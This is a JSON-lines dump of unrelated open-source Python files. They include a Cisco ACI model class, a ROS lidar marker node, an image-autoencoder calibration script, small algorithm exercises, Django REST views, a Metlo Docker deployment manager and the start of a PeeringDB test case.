meta.parentClasses.add(\"cobra.model.fabrgm.Db\")\n\n meta.superClasses.add(\"cobra.model.nw.Conn\")\n meta.superClasses.add(\"cobra.model.nw.Item\")\n meta.superClasses.add(\"cobra.model.nw.DbRec\")\n meta.superClasses.add(\"cobra.model.l3.DbRec\")\n meta.superClasses.add(\"cobra.model.nw.GEp\")\n\n meta.rnPrefixes = [\n ('src-', True),\n ('-grp-', True),\n ]\n\n prop = PropMeta(\"str\", \"childAction\", \"childAction\", 4, PropCategory.CHILD_ACTION)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n prop._addConstant(\"deleteAll\", \"deleteall\", 16384)\n prop._addConstant(\"deleteNonPresent\", \"deletenonpresent\", 8192)\n prop._addConstant(\"ignore\", \"ignore\", 4096)\n meta.props.add(\"childAction\", prop)\n\n prop = PropMeta(\"str\", \"dn\", \"dn\", 1, PropCategory.DN)\n prop.label = \"None\"\n prop.isDn = True\n prop.isImplicit = True\n prop.isAdmin = True\n prop.isCreateOnly = True\n meta.props.add(\"dn\", prop)\n\n prop = PropMeta(\"str\", \"ffLoser\", \"ffLoser\", 54647, PropCategory.REGULAR)\n prop.label = \"MRIB flag: Fabric Forwarder Loser\"\n prop.isOper = True\n prop.defaultValue = False\n prop.defaultValueStr = \"no\"\n prop._addConstant(\"no\", None, False)\n prop._addConstant(\"yes\", None, True)\n meta.props.add(\"ffLoser\", prop)\n\n prop = PropMeta(\"str\", \"grp\", \"grp\", 54642, PropCategory.REGULAR)\n prop.label = \"Group Address\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.isCreateOnly = True\n prop.isNaming = True\n meta.props.add(\"grp\", prop)\n\n prop = PropMeta(\"str\", \"installedToMrib\", \"installedToMrib\", 54646, PropCategory.REGULAR)\n prop.label = \"MRIB flag: Installed to MRIB\"\n prop.isOper = True\n prop.defaultValue = False\n prop.defaultValueStr = \"no\"\n prop._addConstant(\"no\", None, False)\n prop._addConstant(\"yes\", None, True)\n meta.props.add(\"installedToMrib\", prop)\n\n prop = PropMeta(\"str\", \"local\", \"local\", 54643, PropCategory.REGULAR)\n prop.label = \"COOP flag: Local Interest\"\n prop.isOper = True\n prop.defaultValue = False\n prop.defaultValueStr = \"no\"\n prop._addConstant(\"no\", None, False)\n prop._addConstant(\"yes\", None, True)\n meta.props.add(\"local\", prop)\n\n prop = PropMeta(\"str\", \"modTs\", \"modTs\", 7, PropCategory.REGULAR)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n prop.defaultValue = 0\n prop.defaultValueStr = \"never\"\n prop._addConstant(\"never\", \"never\", 0)\n meta.props.add(\"modTs\", prop)\n\n prop = PropMeta(\"str\", \"name\", \"name\", 16437, PropCategory.REGULAR)\n prop.label = \"Name\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(1, 128)]\n meta.props.add(\"name\", prop)\n\n prop = PropMeta(\"str\", \"remote\", \"remote\", 54644, PropCategory.REGULAR)\n prop.label = \"COOP flag: Remote Interest\"\n prop.isOper = True\n prop.defaultValue = False\n prop.defaultValueStr = \"no\"\n prop._addConstant(\"no\", None, False)\n prop._addConstant(\"yes\", None, True)\n meta.props.add(\"remote\", prop)\n\n prop = PropMeta(\"str\", \"rn\", \"rn\", 2, PropCategory.RN)\n prop.label = \"None\"\n prop.isRn = True\n prop.isImplicit = True\n prop.isAdmin = True\n prop.isCreateOnly = True\n meta.props.add(\"rn\", prop)\n\n prop = PropMeta(\"str\", \"src\", \"src\", 54641, PropCategory.REGULAR)\n prop.label = \"Source Address\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.isCreateOnly = True\n prop.isNaming = True\n meta.props.add(\"src\", prop)\n\n prop = PropMeta(\"str\", \"status\", \"status\", 3, PropCategory.STATUS)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n prop._addConstant(\"created\", \"created\", 2)\n prop._addConstant(\"deleted\", \"deleted\", 8)\n prop._addConstant(\"modified\", \"modified\", 4)\n meta.props.add(\"status\", prop)\n\n prop = PropMeta(\"str\", \"stripeWinner\", \"stripeWinner\", 54645, PropCategory.REGULAR)\n prop.label = \"COOP flag: Stripe Winner\"\n prop.isOper = True\n prop.defaultValue = False\n prop.defaultValueStr = \"no\"\n prop._addConstant(\"no\", None, False)\n prop._addConstant(\"yes\", None, True)\n meta.props.add(\"stripeWinner\", prop)\n\n meta.namingProps.append(getattr(meta.props, \"src\"))\n getattr(meta.props, \"src\").needDelimiter = True\n meta.namingProps.append(getattr(meta.props, \"grp\"))\n getattr(meta.props, \"grp\").needDelimiter = True\n\n def __init__(self, parentMoOrDn, src, grp, markDirty=True, **creationProps):\n namingVals = [src, grp]\n Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)\n\n\n\n# End of package file\n# ##################################################\n","repo_name":"pws1453/devasc-notes","sub_path":"python-api-practice/aci/lib/python3.10/site-packages/cobra/modelimpl/fabrgm/route.py","file_name":"route.py","file_ext":"py","file_size_in_byte":5734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74046974568","text":"#!/usr/bin/env python\n\n\nimport rospy\nfrom std_msgs.msg import String,Header\nfrom sensor_msgs.msg import LaserScan\nfrom sensor_msgs.msg import PointCloud2,PointField\nfrom sensor_msgs import point_cloud2\nfrom visualization_msgs.msg import Marker,MarkerArray\nimport math\nglobal publisher\nglobal Array_Near\nglobal Array_Medium\nglobal Array_Far\nglobal MARKERS_MAX_NEAR\nglobal MARKERS_MAX_MEDIUM\nglobal MARKERS_MAX_FAR\n\n\n\ndef messageReceivedCallback(message):\n global pub\n global Array_Near\n global Array_Medium\n global Array_Far\n global MARKERS_MAX_NEAR\n global MARKERS_MAX_MEDIUM\n global MARKERS_MAX_FAR\n Array_Near = MarkerArray()\n Array_Medium = MarkerArray()\n Array_Far = MarkerArray()\n global publisher\n\n angle = message.angle_min\n #List that will contain all [x,y,z] coordinates\n cloud_data_near = []\n cloud_data_medium = []\n cloud_data_far = []\n\n for radius in message.ranges:\n x = radius * math.cos(angle)\n y = radius * math.sin(angle)\n z = 0\n point = (x,y,z)\n\n if radius > 0 and radius < 5:\n cloud_data_near.append(point)\n elif radius > 5 and radius < 10:\n cloud_data_medium.append(point)\n else:\n cloud_data_far.append(point)\n\n angle += message.angle_increment\n\n count_near=0\n count_medium=0\n count_far=0\n for i in range(0,len(cloud_data_near)):\n marker = Marker()\n marker.header.stamp = rospy.Time.now()\n marker.header.frame_id = \"/left_laser\"\n marker.type = marker.SPHERE\n marker.action = marker.ADD\n marker.ns = 'sphere_near'\n marker.scale.x = 0.2\n marker.scale.y = 0.2\n marker.scale.z = 0.2\n marker.color.a = 0.5\n marker.color.r = 0\n marker.color.g = 1\n marker.color.b = 0\n marker.pose.orientation.w = 1.0\n marker.pose.orientation.x = 0\n marker.pose.orientation.y = 0\n marker.pose.orientation.z = 0\n marker.pose.position.x = cloud_data_near[i][0]\n marker.pose.position.y = cloud_data_near[i][1]\n marker.pose.position.z = cloud_data_near[i][2]\n\n if (count_near > MARKERS_MAX_NEAR):\n #Array_Near.markers.pop(0)\n Array_Near=MarkerArray()\n\n\n Array_Near.markers.append(marker)\n id = 0\n for m in Array_Near.markers:\n m.id = id\n\n id += 1\n #publisher.publish(marker)\n publisher.publish(Array_Near)\n count_near+=1\n\n\n for i in range(0,len(cloud_data_medium)):\n marker = Marker()\n marker.header.stamp = rospy.Time.now()\n marker.header.frame_id = \"/left_laser\"\n marker.type = marker.SPHERE\n marker.action = marker.ADD\n marker.ns = 'sphere_medium'\n marker.scale.x = 0.2\n marker.scale.y = 0.2\n marker.scale.z = 0.2\n marker.color.a = 0.5\n marker.color.r = 0\n marker.color.g = 0\n marker.color.b = 1\n marker.pose.orientation.w = 1.0\n marker.pose.orientation.x = 0\n marker.pose.orientation.y = 0\n marker.pose.orientation.z = 0\n marker.pose.position.x = cloud_data_medium[i][0]\n marker.pose.position.y = cloud_data_medium[i][1]\n marker.pose.position.z = cloud_data_medium[i][2]\n\n if (count_medium > MARKERS_MAX_MEDIUM):\n Array_Medium.markers.pop(0)\n\n\n Array_Medium.markers.append(marker)\n id = 0\n for m in Array_Medium.markers:\n m.id = id\n\n id += 1\n #publisher.publish(marker)\n publisher.publish(Array_Medium)\n count_medium += 1\n\n for i in range(0,len(cloud_data_far)):\n marker = Marker()\n marker.header.stamp = rospy.Time.now()\n marker.header.frame_id = \"/left_laser\"\n marker.type = marker.SPHERE\n marker.action = marker.ADD\n marker.ns = 'sphere_far'\n marker.scale.x = 0.2\n marker.scale.y = 0.2\n marker.scale.z = 0.2\n marker.color.a = 0.5\n marker.color.r = 1\n marker.color.g = 0\n marker.color.b = 0\n marker.pose.orientation.w = 1.0\n marker.pose.orientation.x = 0\n marker.pose.orientation.y = 0\n marker.pose.orientation.z = 0\n marker.pose.position.x = cloud_data_far[i][0]\n marker.pose.position.y = cloud_data_far[i][1]\n marker.pose.position.z = cloud_data_far[i][2]\n\n if (count_far > MARKERS_MAX_FAR):\n Array_Far.markers.pop(0)\n\n Array_Far.markers.append(marker)\n\n #publisher.publish(marker)\n publisher.publish(Array_Far)\n count_far += 1\n\n\n\n\n\ndef main():\n global publisher\n global Array_Near\n global MARKERS_MAX_NEAR\n global MARKERS_MAX_MEDIUM\n global MARKERS_MAX_FAR\n\n MARKERS_MAX_NEAR=700\n MARKERS_MAX_MEDIUM=700\n MARKERS_MAX_FAR = 700\n\n\n Array_Near = MarkerArray()\n\n topic_name_bag_file = 'left_laser/laserscan'\n\n rospy.init_node('lidar_subscriber', anonymous=False)\n rospy.Subscriber(topic_name_bag_file, LaserScan, messageReceivedCallback)\n publisher = rospy.Publisher('Marker_topic', MarkerArray, queue_size=100)\n rate = rospy.Rate(10) # 10hz\n\n rospy.spin()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"DanielCoelho112/pari_2020","sub_path":"Parte10/pari_aula10/src/Ex9.py","file_name":"Ex9.py","file_ext":"py","file_size_in_byte":5239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42678438482","text":"import cv2\nimport glob\nimport numpy as np\nimport scipy as sp\nfrom matplotlib import *\nfrom pylab import *\nimport time\nfrom keras.models import Model, model_from_json\nimport numpy as np\nfrom keras import backend as K\nimport tensorflow as tf\nimport os\nfrom sklearn.utils import shuffle\nfrom keras.models import model_from_json\nfrom sklearn.metrics import mean_squared_error\nimport csv\n\n\ndef load_model(model_path):\n with open(model_path + 'auto_model.json', 'r') as jfile:\n model_svdd = model_from_json(jfile.read())\n model_svdd.load_weights(model_path + 'auto_model.h5')\n return model_svdd\n\ndef mse(imageA, imageB):\n\t# the 'Mean Squared Error' between the two images is the\n\t# sum of the squared difference between the two images;\n\t# NOTE: the two images must have the same dimension\n\terr = np.sum((imageA.astype(\"float\") - imageB.astype(\"float\")) ** 2)\n\terr /= float(imageA.shape[0] * imageA.shape[1])\n\n\t# return the MSE, the lower the error, the more \"similar\"\n\t# the two images are\n\treturn err\n\n\n#Load complete input images without shuffling\ndef load_images(paths,calib_path):\n numImages = 0\n inputs = []\n comp_inp = []\n for path in paths:\n print(path)\n numFiles = len(glob.glob1(path,'*.png'))\n numImages += numFiles\n for img in glob.glob(path+'*.png'):\n img = cv2.imread(img)\n img = cv2.resize(img, (224, 224))\n #img = img / 255.\n inputs.append(img)\n #inpu = shuffle(inputs)\n #print(\"Total number of images:%d\" %(numImages))\n j=0\n for i in range(0,len(inputs),5):\n cv2.imwrite(calib_path + \"/frame%d.png\"%j,inputs[i])\n j+=1\n #comp_inp.append(calib_path+ \"/\",inputs[i])\n print(\"Total number of images:%d\" %j)\n # return inputs, comp_inp\n return inputs\n\ndef createFolderPaths(path,folders):\n paths = []\n for folder in folders:\n data_path = path + folder + '/'\n paths.append(data_path)\n return paths\n\ndef load_training_images(path,trainingFolders,calib_path):\n paths = createFolderPaths(path,trainingFolders)\n return load_images(paths,calib_path)\n\ndef load_calib_images(calib_path):\n numImages = 0\n inputs = []\n for img in glob.glob(calib_path+'*.png'):\n img = cv2.imread(img)\n img = cv2.resize(img, (224, 224))\n img = img / 255.\n inputs.append(img)\n #inpu = shuffle(inputs)\n print(\"Total number of images:%d\" %(numImages))\n return inputs\n\ndef calib_data_generation(model_vae,calib_path,model_path):\n calib_images = load_calib_images(calib_path)\n calib_images = np.array(calib_images)\n calib_images = np.reshape(calib_images, [-1, calib_images.shape[1],calib_images.shape[2],calib_images.shape[3]])\n for i in range(0,len(calib_images)):\n dist_val=[]\n img = np.array(calib_images[i])[np.newaxis]\n predicted_reps = model_vae.predict(img)\n dist = mse(predicted_reps, img)\n print(dist)\n dist_val.append(dist)\n with open(model_path + 'test-noon.csv', 'a') as file:\n writer = csv.writer(file)\n writer.writerow(dist_val)\n\nif __name__ == '__main__':\n path = \"/home/scope/Carla/autopilot_Carla_ad/sample_data/new-trial/\"\n # list of folders used in training\n trainingFolders = [\"clear_noon1\",\"clear_noon2\",\"cloudy_noon1\",\"cloudy_noon2\"]\n calib_path = \"/home/scope/Carla/autopilot_Carla_ad/sample_data/new-trial/clear_noon1/\"\n model_path = \"/home/scope/Carla/autopilot_Carla_ad/leaderboard/team_code/detector_code/new-trial-100/\"\n model_vae=load_model(model_path)\n calib_data_generation(model_vae,calib_path,model_path)\n","repo_name":"scope-lab-vu/Resonate","sub_path":"resonate-carla/leaderboard/team_code/detector_code/model-test.py","file_name":"model-test.py","file_ext":"py","file_size_in_byte":3638,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"28024039340","text":"class Solution:\n def climbStairs(self, n: int) -> int:\n if n == 1 or n== 2 :return n\n f1,f2=1,2\n for i in range(3,n+1):\n num=f1+f2\n f1=f2\n f2=num\n return num\n def climbStairs0(self, n: int) -> int:\n import math\n sqrt5=5**0.5\n fibin=math.pow((1+sqrt5)/2,n+1)-math.pow((1-sqrt5)/2,n+1)\n return int(fibin/sqrt5)\n\n","repo_name":"chen-gan-ga/pythonProject","sub_path":"leet-code/array/70爬楼梯.py","file_name":"70爬楼梯.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24735917837","text":"#!/usr/bin/env python3\n\nimport argparse\nfrom base64 import b64encode\nimport secrets\nimport string\nimport subprocess\nimport os\nimport urllib.request\nfrom urllib.parse import quote\nfrom urllib.request import Request, urlopen\nimport json\nimport re\n\nMETLO_DEFAULT_DIR = \"/opt/metlo\"\n\nMETLO_DIR = os.environ.get(\"METLO_DIR\", METLO_DEFAULT_DIR)\nENV_PATH = os.path.join(METLO_DIR, \".env\")\nLICENSE_PATH = os.path.join(METLO_DIR, \"LICENSE_KEY\")\nFILES_TO_PULL = [\"docker-compose.yaml\", \"init.sql\", \"metlo-config.yaml\"]\nUPDATE_FILES_TO_PULL = [\"docker-compose.yaml\", \"init.sql\"]\nIMAGES = [\"backend\", \"frontend\", \"jobrunner\", \"attack-analyzer\"]\n\n\nclass DockerLogin(object):\n def __init__(self):\n pass\n\n def __enter__(self):\n with open(ENV_PATH) as f:\n license_keys = list(filter(lambda x: \"LICENSE_KEY\" in x, f.readlines()))\n if len(license_keys) == 0:\n raise Exception(\"No license key found\")\n license_key = license_keys[0]\n regex = r\"LICENSE_KEY=[\\'\\\"](.*)[\\'\\\"]\"\n matches = re.findall(regex, license_key, re.MULTILINE)\n req = Request(\n f\"https://backend.metlo.com/license-key/docker?licenseKey={quote(matches[0])}\",\n method=\"GET\",\n )\n with urlopen(req) as resp:\n data = json.loads(resp.read())\n username = data[\"username\"]\n pwd = data[\"docker_token\"]\n subprocess.run(\n [\"docker\", \"login\", \"-u\", username, \"--password-stdin\"],\n input=pwd,\n universal_newlines=True,\n )\n\n def __exit__(self, *args, **kwargs):\n subprocess.run([\"docker\", \"logout\"])\n\n\ndef get_file(file_name):\n src = f\"https://raw.githubusercontent.com/metlo-labs/metlo-deploy/main/assets/{file_name}\"\n request = urllib.request.Request(src)\n with urllib.request.urlopen(request) as response:\n data = response.read().decode(\"utf-8\")\n with open(os.path.join(METLO_DIR, file_name), \"w\") as f:\n f.write(data)\n\n\ndef gen_secret(l):\n return \"\".join(\n secrets.choice(string.ascii_uppercase + string.ascii_lowercase)\n for _ in range(l)\n )\n\n\ndef get_license_key(quiet):\n license = os.environ.get(\"LICENSE_KEY\")\n if license is None:\n if quiet:\n license = \"\"\n else:\n license = input(\"[Optional] Please enter your license key: \")\n return license\n\n\ndef write_env(quiet):\n encryption_key = b64encode(secrets.token_bytes(32)).decode(\"UTF-8\")\n express_secret = gen_secret(32)\n redis_password = gen_secret(16)\n license_key = get_license_key(quiet)\n jwt_key = b64encode(secrets.token_bytes(256)).decode(\"UTF-8\")\n init_env_file = f\"\"\"\nENCRYPTION_KEY=\"{encryption_key}\"\nEXPRESS_SECRET=\"{express_secret}\"\nREDIS_PASSWORD=\"{redis_password}\"\nNUM_WORKERS=2\nLICENSE_KEY=\"{license_key}\"\nJWT_KEY=\"{jwt_key}\"\n \"\"\".strip()\n with open(ENV_PATH, \"w\") as f:\n f.write(init_env_file)\n\n\ndef init_env(quiet=False):\n if os.path.exists(ENV_PATH):\n return\n print(\"Initializing Environment...\")\n write_env(quiet)\n\n\ndef pull_files():\n print(\"Pulling Files...\")\n for f in FILES_TO_PULL:\n get_file(f)\n\n\ndef update_files():\n print(\"Pulling Updated Files...\")\n for f in UPDATE_FILES_TO_PULL:\n get_file(f)\n\n\ndef pull_dockers():\n print(\"Pulling Docker Images...\")\n with DockerLogin():\n for e in IMAGES:\n subprocess.run([\"docker\", \"pull\", f\"metlo/enterprise-{e}\"])\n\n\ndef prune_docker():\n print(\"Pruning existing docker images\")\n subprocess.run([\"docker\", \"system\", \"prune\",\"-f\"])\n\n\ndef init(quiet=False):\n if not os.path.exists(METLO_DIR):\n os.mkdir(METLO_DIR)\n init_env(quiet)\n pull_files()\n pull_dockers()\n\n\ndef start():\n subprocess.run([\"docker-compose\", \"up\", \"-d\"], cwd=METLO_DIR)\n\n\ndef stop():\n subprocess.run([\"docker-compose\", \"down\"], cwd=METLO_DIR)\n\n\ndef restart():\n subprocess.run([\"docker-compose\", \"restart\"], cwd=METLO_DIR)\n\n\ndef status():\n subprocess.run([\"docker-compose\", \"ps\"], cwd=METLO_DIR)\n\n\ndef update():\n pull_dockers()\n stop()\n update_files()\n start()\n prune_docker()\n\n\ndef main():\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers(dest=\"command\")\n\n init_cmd = subparsers.add_parser(\"init\")\n init_cmd.add_argument(\n \"-q\", \"--quiet\", help=\"Do not prompt for license key\", action=\"store_true\"\n )\n init_env_cmd = subparsers.add_parser(\"init-env\")\n init_env_cmd.add_argument(\n \"-q\", \"--quiet\", help=\"Do not prompt for license key\", action=\"store_true\"\n )\n start_cmd = subparsers.add_parser(\"start\")\n stop_cmd = subparsers.add_parser(\"stop\")\n status_cmd = subparsers.add_parser(\"status\")\n restart_cmd = subparsers.add_parser(\"restart\")\n update_cmd = subparsers.add_parser(\"update\")\n\n args = parser.parse_args()\n\n command = args.command\n if command == \"init\":\n init(args.quiet)\n elif command == \"init-env\":\n init_env(args.quiet)\n elif command == \"start\":\n start()\n elif command == \"stop\":\n stop()\n elif command == \"restart\":\n restart()\n elif command == \"update\":\n update()\n elif command == \"status\":\n status()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"metlo-labs/metlo-deploy","sub_path":"manage-deployment.py","file_name":"manage-deployment.py","file_ext":"py","file_size_in_byte":5356,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"21316739497","text":"# 给你一个整数数组nums ,找到其中最长严格递增子序列的长度。\r\n# 子序列是由数组派生而来的序列,删除(或不删除)数组中的元素而不改变其余元素的顺序。\r\n# 例如,[3, 6, 2, 7]是数组[0, 3, 1, 6, 2, 2, 7]的子序列。\r\n\r\nclass Solution:\r\n def lengthOfLIS(self, nums: list[int]) -> int:\r\n n = len(nums)\r\n f = [0]*n\r\n for i in range(n):\r\n for j in range(i):\r\n if nums[j] < nums[i]:\r\n f[i] = max(f[i],f[j])\r\n f[i] += 1\r\n return max(f)\r\n\r\n # @cache\r\n # def dfs(i):\r\n # res = 0\r\n # for j in range(i):\r\n # if nums[j] < nums[i]:\r\n # res = max(res,dfs[j])\r\n # return res + 1\r\n #\r\n # return max(dfs(i) for i in range(n))","repo_name":"Ww0225/pythonTest","sub_path":"最长递增子序列.py","file_name":"最长递增子序列.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37026592405","text":"import asyncio\n\nasync def task1():\n print(\"Begin task1\")\n print(\"Completed task1\")\n\nasync def task2():\n print(\"Begin task2\")\n await asyncio.sleep(4)\n await task1()\n print(\"Completed task2\")\n\nasync def task3():\n print(\"Task3 begin\")\n await asyncio.sleep(2)\n print(\"Completed task3\")\n\nasync def main():\n return await asyncio.gather(task2(),task3())\n\n\nif __name__==\"__main__\":\n loop=asyncio.get_event_loop()\n loop.run_until_complete(main())\n loop.close()\n","repo_name":"babiswas2020/Blind-paractise","sub_path":"test55.py","file_name":"test55.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19685351446","text":"# Day 6 of the 2022 Advent of Code\n# Read input file\nwith open(\"../include/input6.inc\",\"r\") as data_file:\n data_str = data_file.read().strip()\n\nmarker_buffer = []\nchar_count = 0\nstart_done = False\nfor character in data_str:\n char_count+=1\n # If character exists in buffer, it now starts after the existing character\n if character in marker_buffer:\n i = marker_buffer.index(character)\n marker_buffer = marker_buffer[i+1:]\n marker_buffer.append(character)\n # First time it's 4 characters long\n if len(marker_buffer)==4 and not start_done:\n start_count = char_count\n start_done = True\n # First time it's 14 characters long\n elif len(marker_buffer)==14:\n message_count = char_count\n break\n\nprint(\"Part1: %s\"%start_count)\nprint(\"Part2: %s\"%message_count)","repo_name":"jpribeir/AdventCalender2022","sub_path":"src/day6.py","file_name":"day6.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13946338601","text":"import csv\nimport os\nimport pandas as pd \nfrom dice_coeff import dice_recur\nfrom cosine import get_cosine\nfrom jaccard_sim import is_ci_token_stopword_set_match\nfrom fuzz_string_matching import get_string_similarity\nfrom rouge_score import calc_Rouge\nfrom sequence_matcher import similar \nfrom surface_features import get_surface_features\nfrom fmeasure import FMeasure\nfrom word2vec_similarity import word2vec_score\nfrom ner_overlap import get_NER_overlap_score\nfrom find_numbers import get_number_similarity\nfrom pmi import getsignificance\nfrom wordnet_similarity import get_wordnet_based_similarity\nfrom tfidf import tfidf_cosine\n#from mine_POS_pats import POSFeatures\n\n#path = \"/home/saurav/Documents/nlp_intern/scisumm-corpus-master/data/Development-Set-Apr8\"\n\ndef findFeature(i,j):\n dice_score = []\n cosine_score = []\n jaccard_score = []\n fuzzy_score = []\n sequence_matcher = []\n fmeasure = []\n word2vec_scores = []\n wordnet_score = []\n tfidf_cosine_score = []\n\n # find features\n dice_score.append(dice_recur(i,j))\n cosine_score.append(get_cosine(i,j))\n jaccard_score.append(is_ci_token_stopword_set_match(i,j))\n fuzzy_score.append(get_string_similarity(i,j))\n sequence_matcher.append(similar(i,j))\n # tf-idf cosine similarity\n tfidf_cosine_score.append(tfidf_cosine(i, j))\n rouge_score = calc_Rouge(i,j)\n surf_features = get_surface_features(i,j)\n fmeasure.append(FMeasure(j))\n #word2vec_scores.append(word2vec_score(i,j))\n ner_overlap_score = get_NER_overlap_score(i,j)\n num_overlap_score = get_number_similarity(i,j)\n # no of significant words + summation of significance values\n significant_score = getsignificance(j)\n # get best similarity between words based on wordnet\n wordnet_score.append(get_wordnet_based_similarity(i,j))\n \n\n features = tuple(dice_score) + tuple(cosine_score) + tuple(jaccard_score) + tuple(fuzzy_score) + tuple(sequence_matcher)+ tuple(tfidf_cosine_score) + rouge_score + tuple(fmeasure) + surf_features + tuple(wordnet_score) + ner_overlap_score + num_overlap_score + significant_score \n featureVector = {}\n\n cnt = -1\n for feature in features:\n cnt +=1 \n featureVector[cnt] = feature\n\n return featureVector\n\n \nfeatureSets = []\n'''\nfor folder in os.listdir(path):\n if os.path.isdir(os.path.join(path, folder)):\n csv_file = os.path.join(path, folder)+\".csv\"\n csv_file = csv_file.replace('\\\\','/')\n print(\"processing: \", csv_file)\n \n dataframe = pd.read_csv(csv_file, header = None, delimiter = \"\\t\")\n a = dataframe[0]\n b = dataframe[1]\n label = dataframe[2]\n\n feature = [(findFeature(x,y),labels) for x,y,labels in zip(a,b,label)]\n #tfidf = str(tfidf_cosine(a, b))\n featureSets = featureSets + feature\n \nprint(len(featureSets))\nprint(featureSets[1])\n'''\npath = \"/home/saurav/Documents/nlp_intern/scisumm-corpus-master/data/Test-Set-2016\"\n\nfor folder in os.listdir(path):\n if os.path.isdir(os.path.join(path, folder)):\n csv_file = os.path.join(path, folder)+\".csv\"\n csv_file = csv_file.replace('\\\\','/')\n print(\"processing: \", csv_file)\n \n dataframe = pd.read_csv(csv_file, header = None, delimiter = \"\\t\")\n a = dataframe[0]\n b = dataframe[1]\n label = dataframe[2]\n\n feature = [(findFeature(x,y),labels) for x,y,labels in zip(a,b,label)]\n #tfidf = str(tfidf_cosine(a, b))\n featureSets = featureSets + feature\n\n# writing features to csv file\nwith open(\"test_no_Word2Vec_features.csv\", \"a\", newline=\"\") as f:\n cw = csv.writer(f)\n cw.writerows([v for _,v in sorted(d.items())] + [s] for d,s in featureSets)\n\n\n\n \n\n","repo_name":"srvCodes/Reference-Scope-Identification-for-Citances-Using-CNN","sub_path":"get_features.py","file_name":"get_features.py","file_ext":"py","file_size_in_byte":3738,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"75041758247","text":"# -*- coding: utf-8 -*-\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework.generics import ListAPIView\nfrom nt_core.exceptions import RsError\n\nfrom nt_app.models import CatResource\nfrom nt_app.serializers import (\n CatResourceCreateSerializer,\n CatResourceListSerializer\n)\n\n\nclass CatResourceView(APIView):\n def post(self, request):\n req_data = request.data\n validate_param = CatResourceCreateSerializer(data=req_data)\n validate_param.is_valid(raise_exception=True)\n data = validate_param.validated_data\n\n cat_obj = CatResource.objects.create(\n **data\n )\n\n return Response({\n 'id': cat_obj.id\n })\n\n def get(self, request):\n req_data = request.GET\n _id = req_data.get('id')\n if not _id:\n raise RsError('id不可缺少')\n\n cat_obj = CatResource.objects.filter(\n id=_id\n ).first()\n if not cat_obj:\n raise RsError('数据不存在')\n ser_data = CatResourceListSerializer(cat_obj).data\n return Response(ser_data)\n\n def put(self, request):\n req_data = request.data\n _id = req_data.get('id')\n if not _id:\n raise RsError('id不可缺少')\n\n cat_obj = CatResource.objects.filter(id=_id).first()\n if not cat_obj:\n raise RsError(\"id不存在\")\n\n ser = CatResourceListSerializer(cat_obj, req_data, partial=True)\n\n if ser.is_valid():\n ser.save()\n else:\n raise RsError(ser.errors)\n\n return Response({\"result\": True, \"id\": _id})\n\n def delete(self, request):\n req_data = request.data\n delete_ids = req_data.get('delete_ids')\n rows = CatResource.objects.filter(\n id__in=delete_ids\n ).delete()\n return Response({\"result\": True, \"rows\": rows})\n\n\nclass CatResourceListView(ListAPIView):\n cat_search_fields = [\n 'appid', 'id', 'response_time', 'request_count',\n 'start_time', 'end_time', 'fail_count'\n ]\n\n serializer_class = CatResourceListSerializer\n\n def list(self, request, *args, **kwargs):\n filters = self.generate_filter(request)\n cat_lists = CatResource.objects.filter(**filters).order_by('-update_time')\n page_data = self.paginate_queryset(cat_lists)\n serializer = self.serializer_class(page_data, many=True)\n\n return self.get_paginated_response(serializer.data)\n\n def generate_filter(self, request):\n req_data = request.GET\n filters = {}\n for filed in self.cat_search_fields:\n field_val = req_data.get(filed)\n if field_val:\n if filed in ['id', 'appid']:\n filters[filed] = field_val\n elif filed in ['start_time']:\n filters['create_time__gt'] = field_val\n elif filed in ['end_time']:\n filters['end_time__lt'] = field_val\n elif filed in ['response_time', 'request_count', 'fail_count']:\n filters['{}__gte'.format(filed)] = field_val\n filters['{}__lte'.format(filed)] = field_val\n\n return filters\n","repo_name":"harvardfly/network_anomaly_detection","sub_path":"nt_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3243,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"53"} +{"seq_id":"12895272272","text":"import json\nimport uuid\n\nimport pytest\nfrom django.conf import settings\nfrom django.contrib.auth import get_user\nfrom django.contrib.auth.models import AnonymousUser, Group\nfrom django.test import Client, RequestFactory, TestCase\nfrom django_grainy.models import GroupPermission, UserPermission\n\nimport peeringdb_server.models as models\nimport peeringdb_server.views as views\n\nfrom .util import ClientCase\n\n\nclass ViewTestCase(ClientCase):\n entities = [\"ix\", \"net\", \"fac\", \"carrier\", \"campus\"]\n\n @classmethod\n def setUpTestData(cls):\n super().setUpTestData()\n\n # create test users\n for name in [\n \"org_admin\",\n \"user_a\",\n \"user_b\",\n \"user_c\",\n \"user_d\",\n \"user_e\",\n \"user_f\",\n ]:\n setattr(\n cls,\n name,\n models.User.objects.create_user(name, \"%s@localhost\" % name, name),\n )\n getattr(cls, name).set_password(name)\n cls.user_group.user_set.add(getattr(cls, name))\n\n # create test org\n cls.org = 